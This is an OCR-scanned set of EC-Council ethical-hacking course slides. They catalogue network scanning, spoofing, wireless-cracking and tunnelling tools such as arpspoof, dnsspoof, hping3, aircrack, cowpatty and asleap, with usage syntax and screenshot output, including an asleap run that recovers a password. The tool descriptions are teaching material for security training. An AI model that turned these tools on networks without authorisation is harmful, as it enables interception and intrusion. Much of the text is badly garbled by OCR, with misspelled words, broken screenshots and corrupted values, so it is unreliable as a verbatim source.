ftpache httpd 2.0.39 <<Unix> nod_perl/l .99_07-dev Perl/u5 . 



25/tcp 
53/tcp 
B0/tcp 
6.1> 

113/tcp closed autli 

Device type: general purpose 

Running: Linux 2.4.X!2.5.X 

OS details: Linux Kernel 2.4.0 - 2.5.20 

Jptine 212.653 days <since Ued May 21 12:40:35 2003> 



Wnap run conpleted 



1 IP address <1 host up> scanned in 54.588 seconds 
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|E:\nnap> 



Scanning Tool : Nmblookup 



© Queries NetBI OS names and map them to their 
appropriate I P address within the network 

© Allows name queries to be directed at a particular I P 
broadcast area or machine 

© All queries are undertaken by UDP 
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Scanni ng Tools : Pnscan, Protos 



Pnscan 

© A multi threaded port scanner that quickly scans a 
large network 

© Faster than nmap 

Protos 
© An I P protocol scanner 

© Navigates through all possible I P protocols and uses a 
negative scan to sort out unsupported protocols 
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Scanning Tools : Raccess, Router- 
Audit-Tool 



Raccess 

© A security tool to analyze the 1 ntegrity of systems 

© Gal ns access to a system usi ng the most advanced 
techniques of remote intrusion 

© Works on normal mode (fast) and hard mode (more 
intensive) 

Router- Audit-Tool 

© Audits router configurations 

© Logs into the routers specified using provided login 
information 

© Provides the NSA's Cisco Router Configuration Guide 
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Scanning Tool : RAT 



© RATS - Rough Auditing Tool for Security 

© Tool for scanning C, C++, Perl, PH P and Python 
source code 

© Provides a security analyst with a list of 
potential trouble spots 

© Provides a relative assessment of the potential 
severity of each problem 
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Scanning Tool : Scanrand 



© A fast network scanner that scans si ngle hosts 
to very large networks efficiently 

© Performs state! ess TCP scanning 
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Scanning Tool : ScanSSh 



© Scans a list of addresses and networks for 
running SSH servers an tiiei r versi on numbers 

© Supports random selection of I P addresses 
from large network ranges 

© Useful for gathering statistics on the 
deployment of SSH 
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Scanning Tools : Spike Proxy, Tiger 



Spike Proxy 

© Functions as a HTTP/ HTTPS proxy 

© Allows the black box tester to automate a number of 
web application vulnerability tests 

Tiger 

© Tiger Analytical Research Assistant (TARA) is an 
upgrade of the 'ti ger' program 

© Scans a Unix system looking for security problems 

© Provides a check of U N I X systems on the A&M 
campus that want to be accessed from off campus 



BC-Councll 



Copyright © byBC-Council 
All Rights reserved. Reproduction is strictly prohibited 




Ethical Hacking 



Spoofing Tools 



Spoofing Tools : Arpspoof, Dhcpx 



Arpspoof 

© Facilitates the interception of networl< traffic normally 
unavailable to an attacker 

© Arpspoof hosts on the same subnet as attacking 
machine 

© Causes changes in ARP settings on the local network 
Dhcpx 

© Dynamic Host Confusion Program 

© Requests al I aval lable I P addresses from a DH CP server 
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Spoofing Too : CDP 



© Utilized for sending CDP (Cisco router Discovery 
Protocol ) messages to the wi re 

© 1 1 is a layer 2 protocol used by Cisco routers on the 
same link (segment) 

© Operates on two different modes 

• Flood mode 

• Spoofing 
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Spoofing Tool : Dnsspoof 



© Forge replies to arbitrary DNS address 
© Pointer queries on the Local Area Network 



^ C:\ WINNT\s¥stem3Z\cmd.eKe 



Usage: dnsspoof count path iplist source fakedip 

count : Packages per ip address. 20 is a good ualue . 
path : Path to the netuox package. Example: /bin/netuox 
iplist : file uith ip addresses. One ip per line, 
source : source ip address. This can be any address, 
fakedip: the ip-address, uhich is present in the remote 
computers cache. 



Id 
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SpoofingTools : Etherwake, File2cable 



Etherwake 



© A littletool to send magic Wake-on- LAN (WOL) packets 

© Wakes up WOL compliant Computers which have been 
powered down to sleep mode 

© Supports WOL passwords 



File2cable 

© Replays a packet capture 

© Locates new vulnerabilities and test concepts 
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Spoofing Tool : Fragroute 



© Test a N I DS by attempti ng to evade usi ng fragmented 
packets 

© I ntercepts, modifies, and rewrites egress traffic desti ned 
for a specified host 

© Assi sts i n the testi ng of networl< i ntrusi on detecti on 
systems 
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Spoof i ng Tool : Gspoof 



© Operates easier and accurate in building and sending of TCP/ IP 
packets 

© Operates fronn the console and provides an GUI environment 



Options 
New [v^p " 



V AbQUT 



If ace ethD 



Sumac m:«):D0;lE;26:F4 



□St mac 00:10: DO: IE 26: F4 



Elll Tvpe jLODPBACH 



Gsooof 5--. ConsolsptK+TCP/ip'p 


Enable TCP paybad 


Netvwsrlt Layer 


get indej^.html 



Sri-addi LEC i&S L.L 



□st 3ddr local host 



ID 32738 



TOS S 



TCP hcad-EF build 
IP header build 
ETH header build 

Bending 100 ma 5pa£:Bd packets for 2 semnds. 
Packets oorrectlv written l2 " 53 bvteal 
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Sri: port 5000 



□st port j SO 

P SYN P ACK 

Flags P FIN P RST 

PUSH P URG 



SEQ 972737203 



ACK D2E.40745L 



Win Size 32767 







j?^ Enable Mu In- Mode 


Number 




Delay Cm ^1 LOO 







Copyright © byBC-Council 
All Rights reserved. Reproduction is strictly prohibited 



L i 



Spoofing Tool : hping3 



© A network tool capable to send custom 
I CM P/U DP/TCP packets 

© Displays target replies I ike ping does with ICI^iP 
replies 

© Handles fragmentation and arbitrary packet body 
and size 

© Tests f i rewal I rules and performs (spoofed) port 
scanning 
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Spoof i ng Too : H SR P 



© Used to take over an H SRP standby I P or 
to force a switchover or to DoS this I P 



BC-Council 



Copyright © byBC-Council 
All Rights reserved. Reproduction is strictly prohibited 



Spoof i ng Too : I CM P redi red 



I 



© An error message sent by a router to the sender 
of an I P packet 

© Used when a router believes a packet is being 
routed sub optimally 

© Hosts with multiple gateways could have one 
default route and more optimal specific routes 
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Spoofing Too : IGRP 



© Establishes passive probingto estimate link 
reliability for wired and wireless networks 

© Link reliabilityof a route equals the mini mum 
link reliability along the path 

© Handles si lent losses 
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Spoofing Tool : IRDP 



© Enables I CM P Router Discovery Protocol (I RDP) 
process! ng on an i nterface. 

© Sends out I RDP responses 
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Spoofing Too : Macchanger 



© utility for manipulating tine MAC address of 
networl< i nterfaces 



© Sets the MAC randomly 

© Displays the vendor MACIist 
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Spoofing Too : Scapy 



© A powerful interactive pacl<et manipulation 
tool, packet generator, network scanner, etc 

© Defi nes a set of packets 

© H olds greater advantage to tools I i ke nmap and 
hping 
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Ethical Hacking 



Wireless Tools 




I 



© Ai rcrack 

© Cracks 802.11 WEP key 

© Promptly recover WEP key from the crowded encrypted packets 

© Applies Fluhrer - Mantin - Shamir (FMS) attack algorithm 

© 3- byte initialization vector (IV) is confronted in every WEP 

encrypted packet where some of them di scl oses i nformati on about 



© Chopchop 

© Faci I itati ng attacker to deci pher the data packets without knowi ng 
the WEP key 

© Works on the single encrypted packet, modifying one byte at a time 



the key 
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Wi re ess Tool : Chopchop 



© Faci I itati ng attacker to deci pher the data 
packets without knowing the WEP key 

© Works on the single encrypted packet, 
modifyi ng one byte at a ti me 
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Wi rel ess Tool : Cowpatty 



© Wi rdess cracki ng tool that makes attempt to 
crack the WPA-PSK by trying various 
passwords 

© Brute-force cracking tool with tremendous 
speed 

© Can test maximum of 30- 60 words per second 

© List of passwords, capture file with a complete 
EAP four-way handshake, as wel I as the SSI D 
for the target network are required 
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Wire ess Tool: Fakeap.p 



© Pearl uti I ity that generates fake AP with random 
ESSI D, BSSI D (MAC), and channel assignments 

© Creates problem for the hackers to get the 
correct AP to work with 



© Syntax: 



fakeap.pl — interface wlanX [ — channel X] [ — mac 

XX:XX. . . ] [ — essid NAME] [ — words 
FILENAME] [ — sleep N] [ — vendors 
FILENAME] [ — wep N] [ — l^ey KEY] [ — power 
N] 
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Wireless Tool : G kismet 



© Kismet is an open source utility used for 
monitoring wireless network traffic 

© gkismet is a GUI front-end tool for kismet 
wireless sniffer, and cannot run independently 

© Displays more data on the screen at once 

© Easily connects to multiple instances of kismet 
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Screen shot : G kismet 



gkismet 



File View Settings Help 



Connect Disconnect Expand 



Q <Sl (21 

Collapse Packet Dump String Dump 



1*} 



Anton's Fortress 
default 
linksys 
-inn fisids- 



default 



<no ssid> 
linksys 

.lUS 

linksys 



_ n X 



■0= 

Locati 



Packe' 
Netwo 

Packe 

Crypt: 

Weak: 

Noise: 

Dropp 

Rate: 



GPS d 
Latituc 

Longit 

Altitud 

Speed 

Fix: 



Packet rate 



Close 



0.000 
3D 



Card po wer- 
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Wireless Tool : Gpsd 



© Servi ce daemon that monitors one or more 
GPSes attached to a host computer through 
serial or USB ports 

© MultipleGPS client applications can share 
access to GPSes without loss of data 

© Responds to queries with a format that is 
substantially easier to parse 



B3-Council 



Copyright © byC-Council 
All Rights reserved. Reproduction isstrictiy proiiibited 



Screenshot : Gpsd 




GPSD,P=40.034S77 -75.520065 
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Wire ess Tool : ( 



© Gpsdriveisacar (I 
system 

© Displaying your pc 



GpsDnue Control 



! S«tt(nflC 



Settings 2 | Way points | Geo Info |^ ^ 



Mice s«nings~ — — 

■ Show Shadows I* Etched frames 

■ Simulatiori; Follow target 

Maximum CPU load Trade 



[50% 








Color 




uniu 

J Miles 
(* Metric 
J Nautic 


(■ Decimal poisltlor 





fwrt and color fettlnofi 



WP Label 



Big display 



Display color 
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Wi rel ess Tool : H ostapd 



© User space daemon for access point and 
authentication servers 

© Supports separate front-end programs 

• text- based front- end 

• hostapd_cli 

© Implements 

•IEEE 802. 11 access point management 

• IEEE 802.1X/WPA/WPA2/EAP Authenticators 

• RADIUSdient 

• EAR server 

• RADI US authentication server 
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Wireless Tool : Wdlenreite 



© Wi reless network discovery and auditi ng tool 

© Easiestto use Linux scanning tool 

© Discover networks (BSS/ 1 BSS), and detects ESSI D 
broadcasting or non- broadcasting networks and their 
WEP capabilities and the manufacturer automatically 



Wellenreiter II 



File Sniffer 



Wellenreiter II 



6 
v-^ About 




Mutii'L J. MiiO.'id'L 
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vf WW .remote -exploit .Dingi 



i^i^^f^n 23:23 



File Sniffer 



LljLog 



[23:20 
[23:20 
[23:20 
[23:20 
[23:20 
[23:21 
[23:21 
[23:21 
[23:21 
[23:21 
[23:21 
[23:21 
[23:22 



: 11] (i) Wellenreiter has been started. 
: 1 1] (i) Running on Unknown'. 
:23] (i) Started Scanning. 
:25] (i)New network: ESSID Vanille' 
:25] (i) New Access Point in Vanille' [6] 
:17] (i)New Wireless Station in Vanille' [kk] 
:19] WARNING: Unhandled IBSS traffic! 
:25] WARNING: Unhandled IBSS traffic! 
:26] WARNING: Unhandled IBSS traffic! 
:28] WARNING: Unhandled IBSS traffic! 
:43] WARNING: Unhandled IBSS traffic! 
:56] (i) New Station in Vanille' [xx] 
:42] (i) Stopped Scanning. 
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Wireless Tools: Wpasupplicant, 
Xsupplicant 



wpasupplicant 

© Provides key negotiation with the WPA Authenticator 
© Controls association with IEEE 802. Hi networks 

xuppi leant 

© Allows a workstation to authenticate with a RADI US 
server usi ng 802. ]x and the EAR protocol 

© Used for computers with wi red or wi reless LAN 
connections 

© Supports dynamic assignment of WER keys 



BC-Council 



Copyright © byBC-Council 
All Rights reserved. Reproduction is strictly prohibited 




Ethical Hacking 



M i seel I aneous Tool s 



Miscellaneous Tool : Asleap 



© Exposes the weaknesses i n Cisco's LEAP protocol 

© Reads weak LEAP passwords from any wi reless i nterface 

© Performs channel hoppi ng to look for targets 

© Uses a dynamic database table and index to make lookups 
on I arge f i I es 

f 



-iL'ight@Mrcur3f aaleap] 5 time , /asleap ~c data/ ppcp . ape -f , ./diet/ aords .db -ft. 
. - / diet/ words, iilx 

iasleap 1.4 - actively recover LEAP/PPTP passHords. <jBi:iglit8 Last) org. com> 
Ufllmg ttoe passive actswjJ? Mflchoci, 

■Captured PPTP exchange inioriitation; 



usectvittie: 
auth crhalleTtge: 
peer challenge: 
peer response! 

challenge: 
hash bytes : 
m haJh! 
passimrd: 



■.361S 

011:11.0773 
OnJQ.OD73 



e3aSd0775370bdaSlel62iga06bD278£ 

84e41)33 E00dS2 3 1645S98aef 9 lc3 8480 

S6Sf e2 492f dSf b8aedae(f93 ^eOOd2e2 c04 622740 6c3 1609b 

7c0 0318403=374*5 

Bl6to 

iaQ73343£ 630tiSi:e2c3 9c03 43 7i 2 ej 6b 
turquoiae 



BC-Council 



Copyright © byBC-Council 
All Rights reserved. Reproduction is strictly prohibited 



Miscellaneous Tools : Cryptcat, 
CryWrap 



Cryptcat 

© it is a Unix utility tool 

© Uses TCP or U DP protocols to read and write data across network 
connections 

© E ncrypts the data bei ng transnni tted 

© Reliable back-end tool 

CryWrap 

© it isa UnixUtilitytool 

© Uses TCP services such as P0P3, 1 MAP, SMTP 

© E ncrypts data usi ng TLS/ SSL 

© Works on the existing servers and doesn't require any nnodifi cations 
© It is a drop-in repi acennent for ssl wrap 
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Miscellaneous Tool : I2tpns 



© I2tpns is a layer 2 tunneling protocol network 
server 

© Supports up to 65535 concurrent sessions per 
server/ cl uster 

© Syntax: 1 2tpns [file] [hostname] 



B3-Council 



Copyright © byC-Council 
All Rights reserved. Reproduction isstrictiy proiiibited 



Miscellaneous Tool : Netdiag 



i 

© It is command-line diagnostic tool 

© Helps to isolate networking and connectivity problems 

© Performs a seri es of tests to determi ne the state of a 
network client 



0 C:\WINNT\system32\cmd.eKe 




X 


C:\Progran Files\Resource Kit>netdiag /? 


1 

1 




Usage: netdiag [/Options ]> 






/q - Quiet output (errors only> 


1 




/u - Uerbose output 


1 




/I - Log output to NetDiag.log 


1 




/debug - Euen more uerbose. 


1 




/d:<DonainNarie> - Find a DC in the specified domain. 


1 




/fix - fix trivial problems. 


1 




/DcftccountEnum - Enumerate DC machine accounts. 


1 




/test:<test name> - tests onlv this test. Non - skippable 


tests uill still h| 




e run 


1 




Ualid tests are :- 


1 




Ndis - Netcard queries Test 


1 




IpConfig - IP config Test 


1 




Member - Domain membership Test 


1 




NetBTTransports - NetBT transports Test 


1 




Autonet - Autonet address Test 


1 




IpLoopBk - IP loopback ping Test 


1 




DefCu - Default gateway Test 


1 




NbtNm - NetBT name Test 


1 




UINS - UINS seruice Test 


1 




Uinsock - Uinsock Test 


1 


li 


DNS - DNS Test 
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Miscellaneous Tool : OpenSSL 



I 



© OpenSSL is a cryptographic tool kit 

© I mplements Secure Socl<ets Layer and 
Transport Layer Security network protocols 

© Uses various cryptography functions of 
OpenSSL's crypto I i brary from the shel I 
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Miscellaneous Tool : Proxychains 



© Forces any TCP connection made by any TCP 
cl i ent to f ol I ow th rough proxy 

© Supports S0CKS4, S0CKS5 and HTTP 
CON N ECr proxy servers 
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M i scd I aneous Tool s: Rdesktop, 
Ssl wrap 



Rdesktop 

© A Remote Desktop Protocol(RDP) Client for accessing Windows 
NTTernninal Server 

© Open source client for Windows NTTernninal Server and Windows 
2000/ 2003 Ternninal Services 

© Runs on nnost UNIX based platfornns with the X Window Systenn 

SslWrap 

© Program that wraps normal socket connections with SSL/TLS 

© Use TCP services such as P0P3, 1 MAP, SMTP, and encrypts all of 
the data 

© Also encrypt data for services located on another computer 
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Miscellaneous Tool : UDPTunnei 



© Program which can tunnel U DP packets bi- 
directionally over a TCP connection 

© Run in two modes: a client mode and a server 
mode 
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